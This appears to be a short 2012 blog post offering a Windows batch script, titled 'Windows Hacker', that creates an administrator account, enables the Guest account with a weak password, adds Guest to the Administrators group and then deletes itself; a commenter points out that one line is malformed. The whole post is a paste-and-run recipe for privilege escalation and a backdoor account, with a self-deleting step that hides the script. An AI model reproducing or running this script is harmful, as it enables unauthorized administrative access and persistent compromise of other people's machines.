Subscribe to our RSS Feeds

Add you in Administrators Group

1 Comments »
Copy and paste the code given below in notepad and save it as anyname.bat(not txt)
then double click on it

echo off
title Windows Hacker
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0



This is how you can add administrative priviliges for guest.
5:54 PM

1 Response to "Add you in Administrators Group"

Anonymous Says :
March 4, 2012 at 7:10 AM

net user localgroup Administrators Username /add

should be

net localgroup Administrators Username /add

Post a Comment